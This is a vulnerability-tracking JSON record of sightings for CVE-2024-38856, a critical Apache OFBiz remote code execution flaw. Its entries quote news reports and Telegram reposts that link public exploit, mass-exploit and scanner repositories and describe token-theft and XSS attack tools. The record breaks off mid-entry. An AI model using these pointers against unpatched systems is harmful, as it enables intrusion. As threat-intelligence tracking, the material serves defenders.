{"vulnerability": "CVE-2024-38856", "sightings": [{"uuid": "49034a87-f4cd-4145-8fa4-033f5e6553fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-08-27T18:10:02.000000Z"}, {"uuid": "bd9574f2-d6d6-4a50-bf42-0038544025fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:03.000000Z"}, {"uuid": "a4254f94-e266-4afa-a787-60180cc8539a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/113986582852375499", "content": "", "creation_timestamp": "2025-02-11T18:07:04.242970Z"}, {"uuid": "92fd4178-2f83-4b6c-993d-bc5f20b458b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://bsky.app/profile/darkwebinformer.bsky.social/post/3lhwaspmick27", "content": "", "creation_timestamp": "2025-02-11T18:07:08.973930Z"}, {"uuid": "d2df3876-de05-4401-a989-06ae67a2d75a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "33baaaaf-442f-4783-a650-5563122fcfe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb", "content": "", "creation_timestamp": "2024-06-17T15:39:13.000000Z"}, {"uuid": "f073cb6e-d572-4c2f-afd1-6f883369cca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:57.000000Z"}, {"uuid": "28b200f5-3ddb-4bd8-b6c8-45b029d18159", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-38856", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3m34nw3i2l62b", "content": "", "creation_timestamp": "2025-10-14T02:16:18.572977Z"}, {"uuid": "777ee644-628c-4235-b45a-6bad97452095", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:03.000000Z"}, {"uuid": "4b6bc12d-e855-434e-babd-11f411ba7b0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3lv7s7ydh6j2x", "content": "", "creation_timestamp": "2025-07-30T23:40:15.011950Z"}, {"uuid": "a3f45e58-73c6-4a32-930c-0b64cc17534d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": 
"https://t.me/HackerArsenal/190", "content": "#exploit\n1. CVE-2024-7646:\nIngress-NGINX Annotation Validation Bypass\nhttps://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass\n\n2. CVE-2024-38856:\nApache OFBiz Pre-Authentication RCE (Scanner + Exploit)\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner", "creation_timestamp": "2024-08-20T04:46:41.000000Z"}, {"uuid": "626b26f9-a460-4114-80a8-c89874b5e4d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/4645e397-736b-45b9-b691-2ec5c8a89595", "content": "", "creation_timestamp": "2026-02-02T12:26:30.497574Z"}, {"uuid": "9e34e3d0-19ef-4ee3-8e0c-dc1bad4fd16a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8198", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aApache OFBiz RCE Scanner - CVE-2024-38856\nURL\uff1ahttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-08-08T02:47:20.000000Z"}, {"uuid": "34ff718e-243b-423d-b2c2-822cb580bc05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8293", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit for CVE-2024-38856 affecting Apache OFBiz versions before 
18.12.15\nURL\uff1ahttps://github.com/Praison001/CVE-2024-38856-ApacheOfBiz\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-18T15:30:21.000000Z"}, {"uuid": "818c2d02-2795-4a2b-9fb7-5d045b7c823d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8325", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-38856 Exploit\nURL\uff1ahttps://github.com/0x20c/CVE-2024-38856-EXP\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-22T03:16:31.000000Z"}, {"uuid": "25a7b873-bd76-4f15-9e37-6ebcc6b54788", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8220", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aMass Exploit - CVE-2024-38856 [Remote Code Execution]\nURL\uff1ahttps://github.com/codeb0ss/CVE-2024-38856-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-09T11:29:59.000000Z"}, {"uuid": "bd34a02f-1c32-41b5-8039-b2fa21e4b149", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9695", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aTentang Pemindai &amp; Eksploitasi Apache OFBiz RCE (CVE-2024-38856)\nURL\uff1ahttps://github.com/FakesiteSecurity/CVE-2024-38856_Scen\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2025-01-02T15:27:37.000000Z"}, 
{"uuid": "6acdb659-c4b4-4d86-ab51-efd8ff191821", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8383", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1anuclei template to detect CVE-2024-38856 affecting Apache OFbiz before 18.12.15\nURL\uff1ahttps://github.com/north-vuln-intel/CVE-2024-38856-NUCLEI\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-27T20:31:01.000000Z"}, {"uuid": "31a3a4e5-57a9-4448-b6fb-3f7241588c02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8226", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPerform With Massive Apache OFBiz Zero-Day Scanner &amp; RCE\nURL\uff1ahttps://github.com/ThatNotEasy/CVE-2024-38856\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-10T03:08:55.000000Z"}, {"uuid": "5d3a7962-9179-4677-8ef1-518f8e22a7a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "Telegram/rgVWXG_JF3lBzF944Q1uZEdqOiMVLUPqZjS8co3vkMC7j4o", "content": "", "creation_timestamp": "2025-10-10T09:00:05.000000Z"}, {"uuid": "b8b9afb9-f184-43ba-9f93-b2d9436fe6eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8389", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aApache OFBiz CVE-2024-38856\nURL\uff1ahttps://github.com/BBD-YZZ/CVE-2024-38856-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-08-28T07:14:13.000000Z"}, {"uuid": "d04f452f-6aa4-43ef-b44c-79489766ffd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9145", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-38856 \u662f Apache OFBiz \u4e2d\u7684\u4e00\u4e2a\u4e25\u91cd\u6f0f\u6d1e\uff0c\u5141\u8bb8\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u653b\u51fb\u8005\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002 \nURL\uff1ahttps://github.com/XiaomingX/cveCVE-2024-38856-poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-23T03:56:47.000000Z"}, {"uuid": "09e58320-725c-471e-92a2-de62db138fe4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_News/705", "content": "\ud83d\udea8 News Alert!\n\nSource: Dark Web Informer - Cyber Threat Intelligence\nTitle: Apache OFBiz Exploit - CVE-2024-38856\nLink: https://darkwebinformer.com/apache-ofbiz-exploit-cve-2024-38856/", "creation_timestamp": "2025-02-11T18:16:13.000000Z"}, {"uuid": "d8ead8b7-302c-4416-b3f5-3c9649e040dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "Telegram/RtBtSsFKIk3Jaokw08JuXDeCFSR5TR3cziEK79g_JImSWQ", "content": "", "creation_timestamp": 
"2024-08-06T08:56:52.000000Z"}, {"uuid": "be5261d6-5f44-4a9e-bff0-084b1e10fe5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/2198", "content": "\ud83d\udca1CVE-2024-38856 - Apache OFBiz RCE Scanner &amp; Exploit Released\n\nhttps://darkwebinformer.com/cve-2024-38856-apache-ofbiz-rce-scanner-exploit/", "creation_timestamp": "2024-08-08T17:00:58.000000Z"}, {"uuid": "6d900dc7-adcf-42ef-89e3-b3846b065980", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/19012", "content": "The Hacker News\nCISA Flags Critical Apache OFBiz Flaw Amid Active Exploitation Reports\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw affecting the Apache OFBiz open-source enterprise resource planning (ERP) system to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.\nThe vulnerability, known as CVE-2024-38856, carries a CVSS score of 9.8, indicating critical severity.", "creation_timestamp": "2024-08-28T10:07:16.000000Z"}, {"uuid": "e77e317e-749b-423e-968d-3f05cfe27fb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/11143", "content": "\u200aCVE-2024-38856 : A Practical Guide To Leveraging Bash And Nuclei\n\nhttps://kalilinuxtutorials.com/cve-2024-38856/", "creation_timestamp": "2024-08-24T09:50:29.000000Z"}, {"uuid": "d61f9fe7-0db4-455f-bb21-cd686ab067b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/8677", "content": "\u200aCVE-2024-38856: Critical Apache OFBiz Flaw Opens Door to Unauthorized Code Execution\n\nhttps://securityonline.info/cve-2024-38856-critical-apache-ofbiz-flaw-opens-door-to-unauthorized-code-execution/", "creation_timestamp": "2024-08-05T11:10:43.000000Z"}, {"uuid": "a1e9f644-0f82-4822-8fbf-0ecf784bdcb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "Telegram/6sGhaQz9bb_0Q9_HmpBktyh5m4xW9tO2qMpj4unBggJ165Yu", "content": "", "creation_timestamp": "2024-09-03T11:22:46.000000Z"}, {"uuid": "1910ca89-144b-4a24-9065-1290b79155d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/cvedetector/2440", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-38856 - Apache OFBiz Arbitrary Screen Rendering Authorization Bypass\", \n  \"Content\": \"CVE ID : CVE-2024-38856 \nPublished : Aug. 5, 2024, 9:15 a.m. | 40\u00a0minutes ago \nDescription : Incorrect Authorization vulnerability in Apache OFBiz.  \n  \nThis issue affects Apache OFBiz: through 18.12.14.  \n  \nUsers are recommended to upgrade to version 18.12.15, which fixes the issue.  \n  \nUnauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints). 
\nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"05 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-05T12:14:03.000000Z"}, {"uuid": "4abb1b1b-9852-4d30-a39e-bea0a59b3bd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "Telegram/1yUgmKS96BNCHiP-A5HD9dF6vFye_2fIX_5--BH9JWU94A", "content": "", "creation_timestamp": "2024-08-28T10:07:17.000000Z"}, {"uuid": "aad51588-3e3d-4f02-88f0-d8dec4230727", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/12320", "content": "\ud83d\udea8Apache OFBiz Exploit - CVE-2024-38856\n\n\ud83d\udd17 PoC: https://github.com/AlissonFaoli/Apache-OFBiz-Exploit\n\ud83d\uded1 CVE: CVE-2024-38856\n\ud83d\udcbb Affected: Apache OFBiz \u2264 18.12.14\n\u26a0\ufe0f Type: Remote Code Execution (RCE)\n\ud83d\udd13 Exploitation: No authentication required", "creation_timestamp": "2025-02-11T19:06:57.000000Z"}, {"uuid": "abc90372-26ae-4f79-89ab-326586d74d65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/17060", "content": "The Hacker News\nNew Zero-Day Flaw in Apache OFBiz ERP Allows Remote Code Execution\n\nA new zero-day pre-authentication remote code execution vulnerability has been disclosed in the Apache OFBiz open-source enterprise resource planning (ERP) system that could allow threat actors to achieve remote code execution on affected instances.\nTracked as CVE-2024-38856, the flaw has 
a CVSS score of 9.8 out of a maximum of 10.0. It affects Apache OFBiz versions prior to 18.12.15.\n\"The", "creation_timestamp": "2024-08-06T08:56:53.000000Z"}, {"uuid": "f3c9095c-52e4-43e7-8ae4-4dba52801412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/YourAnonTl3x/6673", "content": "CISA Warns of CVE-2024-38856 Vulnerability in Apache OFBiz\nThe US Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert about an active security vulnerability in the open source enterprise resource management system Apache OFBiz. The vulnerability, tracked as CVE-2024-38856, has been added to CISA's list of known exploited vulnerabilities (KEV). CVE \nhttps://ghostmanews.blogspot.com/2024/09/cisa-warns-of-cve-2024-38856.html", "creation_timestamp": "2024-09-01T10:57:46.000000Z"}, {"uuid": "d366a1d7-4810-4dd3-a3f1-d421f7135427", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/paiddpam/4043", "content": "https://github.com/ThatNotEasy/CVE-2024-38856", "creation_timestamp": "2024-08-10T09:29:35.000000Z"}, {"uuid": "09d54aee-dfab-4a5e-9766-73102873030d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/1254", "content": 
"https://github.com/Unrealisedd/nuclei-templates\nhttps://github.com/0xdln1/nuclei-templates\nhttps://github.com/securitytaters/nuclei-templates\nhttps://github.com/Sajibekanti/Nuclei_templates\nhttps://github.com/Vulker111/nuclei-templates\nhttps://github.com/smn666/Nuclei_templates_2024\nhttps://github.com/sylncereyes/The-Nuclei-Templates\nhttps://github.com/lupedsagaces/my-nuclei-templates\nhttps://github.com/ReksySec/3Nuclei-Templates\nhttps://github.com/Kuray12/prv8_nuclei_templates\nhttps://github.com/malectricasoftware/SwaggerX\nhttps://github.com/emanueldosreis/CVE-2024-38856\nhttps://github.com/aredspy/CVE-2021-41182-Tester\nhttps://github.com/ZoomerTedJackson/Salesforce-ContentDocument-DetectorNuclei-Template\nhttps://github.com/0xPugal/my-nuclei-templates\nhttps://github.com/Sajibekanti/Nuclei_templates\nhttps://github.com/sylncereyes/The-Nuclei-Templates\nhttps://github.com/lupedsagaces/my-nuclei-templates\nhttps://github.com/NoRed0x/nored0x-Nuclei-Templates\nhttps://github.com/smn666/Nuclei_templates_2024", "creation_timestamp": "2025-04-22T02:52:22.000000Z"}, {"uuid": "888f6f9d-4d4a-4658-b253-b9767554fd38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/3824", "content": "The Hacker News\nCISA Flags Critical Apache OFBiz Flaw Amid Active Exploitation Reports\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw affecting the Apache OFBiz open-source enterprise resource planning (ERP) system to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.\nThe vulnerability, known as CVE-2024-38856, carries a CVSS score of 9.8, indicating critical severity.", "creation_timestamp": "2024-08-28T10:07:16.000000Z"}, {"uuid": "fe0ab209-6917-4717-9047-948d9694f986", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/anonymous_secures/862", "content": "CISA Warns of CVE-2024-38856 Vulnerability in Apache OFBiz\nThe US Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert about an active security vulnerability in the open source enterprise resource management system Apache OFBiz. The vulnerability, tracked as CVE-2024-38856, has been added to CISA's list of known exploited vulnerabilities (KEV). CVE \nhttps://ghostmanews.blogspot.com/2024/09/cisa-warns-of-cve-2024-38856.html", "creation_timestamp": "2024-09-01T10:57:28.000000Z"}, {"uuid": "125c6534-27be-4767-a9f8-088f313fdf64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8637", "content": "Tools\u00a0 - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. 
Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner &amp; Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-21T04:58:22.000000Z"}, {"uuid": "a405f62b-b5dc-4744-8591-093bc40e6a9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "Telegram/s-6x0SsG_2UF2F0LQDkdikvC0204B1iw9654a3zoOI7OzA", "content": "", "creation_timestamp": "2024-08-06T09:42:22.000000Z"}, {"uuid": "822ff7cc-3c07-4fb4-a22c-c299d61f1b1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "Telegram/kbnLMXKpb1ZpGOs0iCXimnErr_duDcuBPPv43knNb5vnEg", "content": "", "creation_timestamp": "2024-08-28T08:59:39.000000Z"}, {"uuid": 
"6b15a233-5886-4c0f-b5a6-5dc6a2e1775c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/3339", "content": "The Hacker News\nNew Zero-Day Flaw in Apache OFBiz ERP Allows Remote Code Execution\n\nA new zero-day pre-authentication remote code execution vulnerability has been disclosed in the Apache OFBiz open-source enterprise resource planning (ERP) system that could allow threat actors to achieve remote code execution on affected instances.\nTracked as CVE-2024-38856, the flaw has a CVSS score of 9.8 out of a maximum of 10.0. It affects Apache OFBiz versions prior to 18.12.15.\n\"The", "creation_timestamp": "2024-08-06T08:56:53.000000Z"}, {"uuid": "7fa07d15-22bb-40e2-9372-cf08a3ab19b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/KomunitiSiber/2356", "content": "New Zero-Day Flaw in Apache OFBiz ERP Allows Remote Code Execution\nhttps://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html\n\nA new zero-day pre-authentication remote code execution vulnerability has been disclosed in the Apache OFBiz open-source enterprise resource planning (ERP) system that could allow threat actors to achieve remote code execution on affected instances.\nTracked as CVE-2024-38856, the flaw has a CVSS score of 9.8 out of a maximum of 10.0. 
It affects Apache OFBiz versions prior to 18.12.15.\n\"The", "creation_timestamp": "2024-08-06T07:15:14.000000Z"}, {"uuid": "c696b5e9-f06f-4017-8b5e-dd9dedf79e49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "Telegram/5ubDiOPhpE3YXrILNQXATGJJi9BbUr-zrtzW-n3816ppGAI", "content": "", "creation_timestamp": "2025-02-11T10:00:05.000000Z"}, {"uuid": "1df1a650-5a2b-4372-bf52-8e960d674362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/716", "content": "Tools  - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any 